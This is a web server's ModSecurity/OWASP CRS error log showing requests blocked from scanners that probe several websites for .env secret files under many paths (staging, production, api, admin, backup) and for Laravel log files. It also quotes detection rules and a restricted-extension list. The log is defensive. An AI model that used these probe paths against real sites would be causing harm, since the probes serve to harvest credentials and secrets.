[Mon May 11 17:33:58.026727 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/qa/.env"] [unique_id "agH25vy_GXSWIKeli0sMiQAAAI8"]
[Mon May 11 17:33:58.027001 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH25vy_GXSWIKeli0sMiQAAAI8"]
[Mon May 11 17:33:58.233669 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /preview/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/preview/.env"] [unique_id "agH25vy_GXSWIKeli0sMigAAAI8"]
[Mon May 11 17:33:58.233886 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/preview/.env"] [unique_id "agH25vy_GXSWIKeli0sMigAAAI8"]
[Mon May 11 17:33:58.234106 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH25vy_GXSWIKeli0sMigAAAI8"]
[Mon May 11 17:33:58.674567 2026] [security2:error] [pid 1412074:tid 1412080] [client 3.15.40.244:53794] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /beta/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/beta/.env"] [unique_id "agH25jJnyuKVXoStDhbNLwAAAEQ"]
[Mon May 11 17:33:58.674803 2026] [security2:error] [pid 1412074:tid 1412080] [client 3.15.40.244:53794] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/beta/.env"] [unique_id "agH25jJnyuKVXoStDhbNLwAAAEQ"]
[Mon May 11 17:33:58.675534 2026] [security2:error] [pid 1412074:tid 1412080] [client 3.15.40.244:53794] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH25jJnyuKVXoStDhbNLwAAAEQ"]
[Mon May 11 17:33:58.791983 2026] [security2:error] [pid 1412074:tid 1412080] [client 3.15.40.244:53794] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /uat/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/uat/.env"] [unique_id "agH25jJnyuKVXoStDhbNMAAAAEQ"]
[Mon May 11 17:33:58.792305 2026] [security2:error] [pid 1412074:tid 1412080] [client 3.15.40.244:53794] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/uat/.env"] [unique_id "agH25jJnyuKVXoStDhbNMAAAAEQ"]
[Mon May 11 17:33:58.792543 2026] [security2:error] [pid 1412074:tid 1412080] [client 3.15.40.244:53794] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH25jJnyuKVXoStDhbNMAAAAEQ"]
[Mon May 11 17:33:58.907379 2026] [security2:error] [pid 1412074:tid 1412080] [client 3.15.40.244:53794] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /stage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/stage/.env"] [unique_id "agH25jJnyuKVXoStDhbNMQAAAEQ"]
[Mon May 11 17:33:58.907612 2026] [security2:error] [pid 1412074:tid 1412080] [client 3.15.40.244:53794] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/stage/.env"] [unique_id "agH25jJnyuKVXoStDhbNMQAAAEQ"]
[Mon May 11 17:33:58.907827 2026] [security2:error] [pid 1412074:tid 1412080] [client 3.15.40.244:53794] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH25jJnyuKVXoStDhbNMQAAAEQ"]
[Mon May 11 17:33:59.021689 2026] [security2:error] [pid 1412074:tid 1412080] [client 3.15.40.244:53794] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /development/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/development/.env"] [unique_id "agH25zJnyuKVXoStDhbNMgAAAEQ"]
[Mon May 11 17:33:59.021916 2026] [security2:error] [pid 1412074:tid 1412080] [client 3.15.40.244:53794] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/development/.env"] [unique_id "agH25zJnyuKVXoStDhbNMgAAAEQ"]
[Mon May 11 17:33:59.022126 2026] [security2:error] [pid 1412074:tid 1412080] [client 3.15.40.244:53794] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH25zJnyuKVXoStDhbNMgAAAEQ"]
[Mon May 11 17:33:59.143572 2026] [security2:error] [pid 1412074:tid 1412080] [client 3.15.40.244:53794] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /production/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/production/.env"] [unique_id "agH25zJnyuKVXoStDhbNMwAAAEQ"]
[Mon May 11 17:33:59.143852 2026] [security2:error] [pid 1412074:tid 1412080] [client 3.15.40.244:53794] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/production/.env"] [unique_id "agH25zJnyuKVXoStDhbNMwAAAEQ"]
[Mon May 11 17:33:59.144074 2026] [security2:error] [pid 1412074:tid 1412080] [client 3.15.40.244:53794] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH25zJnyuKVXoStDhbNMwAAAEQ"]
[Mon May 11 17:33:59.263021 2026] [security2:error] [pid 1412074:tid 1412080] [client 3.15.40.244:53794] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/config/app/.env"] [unique_id "agH25zJnyuKVXoStDhbNNAAAAEQ"]
[Mon May 11 17:33:59.263277 2026] [security2:error] [pid 1412074:tid 1412080] [client 3.15.40.244:53794] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/config/app/.env"] [unique_id "agH25zJnyuKVXoStDhbNNAAAAEQ"]
[Mon May 11 17:33:59.263515 2026] [security2:error] [pid 1412074:tid 1412080] [client 3.15.40.244:53794] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH25zJnyuKVXoStDhbNNAAAAEQ"]
[Mon May 11 17:34:19.158949 2026] [security2:error] [pid 1411099:tid 1411292] [client 175.27.163.171:42190] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "tchatbooster.com"] [uri "/"] [unique_id "agH2-w-Qm4vhlWBPlMjRygAAAAg"]
[Mon May 11 17:34:23.089872 2026] [security2:error] [pid 1411201:tid 1411247] [client 175.27.163.171:60538] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.tchatbooster.com"] [uri "/"] [unique_id "agH2__y_GXSWIKeli0sMpQAAAIE"], referer: http://tchatbooster.com
[Mon May 11 17:34:24.573553 2026] [authz_core:error] [pid 1424905:tid 1424909] [client 176.120.22.46:61156] AH01630: client denied by server configuration: /home/labaujue/public_html/wp-includes/l10n/error_log, referer: http://www.labaujue.com/wp-includes/l10n/
[Mon May 11 17:34:28.622001 2026] [security2:error] [pid 1411201:tid 1411266] [client 185.213.174.48:52192] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.env.staging"] [unique_id "agH3BPy_GXSWIKeli0sMswAAAJU"]
[Mon May 11 17:34:28.622959 2026] [security2:error] [pid 1411201:tid 1411266] [client 185.213.174.48:52192] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.env.staging"] [unique_id "agH3BPy_GXSWIKeli0sMswAAAJU"]
[Mon May 11 17:34:28.623775 2026] [security2:error] [pid 1412074:tid 1412082] [client 185.213.174.48:52166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.env.backup"] [unique_id "agH3BDJnyuKVXoStDhbNuQAAAEY"]
[Mon May 11 17:34:28.624766 2026] [security2:error] [pid 1424905:tid 1424921] [client 185.213.174.48:52230] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/admin/.env"] [unique_id "agH3BIW8yzYoWG_eyCWuxAAAAU0"]
[Mon May 11 17:34:28.624928 2026] [security2:error] [pid 1412074:tid 1412082] [client 185.213.174.48:52166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.env.backup"] [unique_id "agH3BDJnyuKVXoStDhbNuQAAAEY"]
[Mon May 11 17:34:28.626071 2026] [security2:error] [pid 1411201:tid 1411268] [client 185.213.174.48:52216] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/api/.env"] [unique_id "agH3BPy_GXSWIKeli0sMtgAAAJc"]
[Mon May 11 17:34:28.626087 2026] [security2:error] [pid 1412074:tid 1412082] [client 185.213.174.48:52166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.env.backup"] [unique_id "agH3BDJnyuKVXoStDhbNuQAAAEY"]
[Mon May 11 17:34:28.623044 2026] [security2:error] [pid 1411201:tid 1411256] [client 185.213.174.48:52088] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "of-crystal-lake.net"] [uri "/storage/logs/laravel.log"] [unique_id "agH3BPy_GXSWIKeli0sMtAAAAIo"]
[Mon May 11 17:34:28.626319 2026] [security2:error] [pid 1424905:tid 1424921] [client 185.213.174.48:52230] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/admin/.env"] [unique_id "agH3BIW8yzYoWG_eyCWuxAAAAU0"]
[Mon May 11 17:34:28.626043 2026] [security2:error] [pid 1424905:tid 1424916] [client 185.213.174.48:52242] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/backend/.env"] [unique_id "agH3BIW8yzYoWG_eyCWuxQAAAUg"]
[Mon May 11 17:34:28.626388 2026] [security2:error] [pid 1411055:tid 1411059] [client 185.213.174.48:52138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.env.production"] [unique_id "agH3BEWKUxpmnkK7zHyWIwAAAQI"]
[Mon May 11 17:34:28.624793 2026] [security2:error] [pid 1424905:tid 1424919] [client 185.213.174.48:52134] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.env"] [unique_id "agH3BIW8yzYoWG_eyCWuwgAAAUs"]
[Mon May 11 17:34:28.626640 2026] [security2:error] [pid 1411055:tid 1411059] [client 185.213.174.48:52138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.env.production"] [unique_id "agH3BEWKUxpmnkK7zHyWIwAAAQI"]
